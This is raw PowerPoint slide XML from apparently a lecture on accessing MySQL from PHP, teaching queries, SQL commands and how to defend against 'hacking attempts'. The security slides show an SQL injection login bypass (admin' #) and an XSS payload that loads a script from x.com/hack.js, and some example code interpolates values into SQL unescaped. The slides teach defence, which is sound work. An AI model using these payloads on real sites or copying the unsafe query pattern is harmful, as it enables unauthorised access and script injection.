              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo "The Insert ID was: " . $conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>insert_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;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E36990-C7D4-4B94-8611-3093514DF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725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7E12D-F096-42C8-9916-5C73FFB50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Performing Additional Queries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AFB30-D519-4FF8-8BD9-DB6880355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19799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 10-15. Performing a secondary query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "SELECT * FROM customers";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $rows = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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4DA871-0AF0-4942-AAE3-6F0475490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472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7E12D-F096-42C8-9916-5C73FFB50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Performing Additional Queries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AFB30-D519-4FF8-8BD9-DB6880355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556326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US" dirty="0"/>
              <a:t>for ($j = 0 ; $j &lt; $rows ; ++$j) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PK" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $row = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>(MYSQLI_NUM);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>($row[0]) . " purchased ISBN " .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>($row[1]) . ":&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $subquery = "SELECT * FROM classics WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>='$row[1]’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>subresult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> = $conn-&gt;query($subquery);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  if (!$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>subresult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>subrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>subresult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>(MYSQLI_NUM);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  echo "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>;" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>("'$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>subrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>[1]'") . " by " .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>subrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>[0]) . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK" sz="3000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK" sz="3000" dirty="0"/>
              <a:t>?&gt;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4DA871-0AF0-4942-AAE3-6F0475490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3141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F17FA-3971-45EE-A58B-0128ABB50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Hacking Attempts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27D75-7F0E-48E4-8669-BF6F65C11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SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is dangerous to pass user input unchecked to MySQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method for all calls to MySQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using prepared statements (placeholders) is recommended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Injection	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross site scripting (XSS attack) occurs when JavaScript code can be input by a user and then displayed by your website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method to avoid executing scripts inside browser.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A585A5-C8CD-4FBF-9DFC-251683891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279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23193-BF6C-49FD-A0F2-92C4FD517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Hacking Attempts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ADAEC-3417-49BB-8370-81423A741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622541" cy="5556326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$user = $_POST['user'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$pass = $_POST['pass'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$query = "SELECT * FROM users WHERE user='$user' AND   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                pass='$pass’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if someone enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin' # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for $user and nothing for $pass?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user will be logged in as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without entering the password. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The # symbol which  represents the start of a comment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String that would be sent to MySQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	SELECT * FROM users WHERE user='admin' #' AND pass=''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679C1E-C6DA-4860-9BC6-557C975D1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95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F5CED-7617-470A-B285-48D0DD7BF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 Commands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43C99-CF23-4EF0-9103-D59663DB0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243504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The AUTO_INCREMENT attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generates a unique identity for rows by automatically incrementing column values starting from 1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each table can have only one AUTO_INCREMENT column. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding data to a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT command is used to add data to a table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Insert a row into the classics table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>INSERT INTO classics(author, title, type, year)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>VALUES('William </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Shakespeare','Romeo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> and Juliet','Play','1594');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4EB4C0-B814-49B2-92E8-0960E0301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888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E9F10-F449-47D5-89FA-39BEEE654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Hacking Attempts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AE3CE-DBA3-4CD6-9202-300183C30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HTML Injection Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='http://x.com/hack.js'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;&lt;script&gt;hack();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This code loads in a JavaScript program and then executes malicious functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it is first passed through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it will be turned into the following totally harmless string:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>='http://x.com/hack.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lt;script&amp;gt;hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>();&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>;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4A73EC-3E9F-4CBF-92CE-80A389D9F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79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F5CED-7617-470A-B285-48D0DD7BF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a MySQL Database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43C99-CF23-4EF0-9103-D59663DB0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197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SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracts data from a table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Select all columns from classics table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	SELECT * FROM classics;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Narrows down queries to only those rows which satisfies a certain expression.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ORDER BY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sorts returned results by one or more columns in ascending or descending order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: List all book titles from classics sorted by their author names in ascending order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SELECT author, title FROM classics ORDER BY author;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4EB4C0-B814-49B2-92E8-0960E0301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89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F5CED-7617-470A-B285-48D0DD7BF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a MySQL Database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43C99-CF23-4EF0-9103-D59663DB0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19799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Removes row(s) from a table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Remove all the books by “William Shakespeare”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DELETE FROM classics WHERE author = 'William Shakespeare’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE...SET </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updates the contents of a field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Update the author name “William Shakespeare” to “Shakespeare”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	UPDATE classics SET author='Shakespeare'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	WHERE author='William Shakespeare';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4EB4C0-B814-49B2-92E8-0960E0301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8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710AC-5C0E-4AB6-BB0A-E77A506B3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a MySQL Database with PHP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2B097-B37A-49FF-954A-D368D121F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054674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using PHP as an interface to MySQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate query based on user input and get results that can be displayed on a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The process of using MySQL with PHP is as follows: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00" dirty="0"/>
              <a:t>Connect to MySQL and select the database to use.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00" dirty="0"/>
              <a:t>Prepare a query string.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00" dirty="0"/>
              <a:t>Perform the query.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00" dirty="0"/>
              <a:t>Retrieve the results and output them to a web page.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00" dirty="0"/>
              <a:t>Repeat steps 2 to 4 until all desired data has been retrieved.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00" dirty="0"/>
              <a:t>Disconnect from MySQL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" sz="3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70CEF-82F1-485B-9CB0-CD9516BE7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174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769DB-D323-46F6-9AD0-C18869281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Login File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D5C61-F01C-4EC4-8C08-3ED64DC91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087" y="1317716"/>
            <a:ext cx="11279909" cy="5411873"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple web pages may need to access database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a single file to include login details and include this file where needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The enclosing &lt;?php and ?&gt; tags are important to hide the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 10-1. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
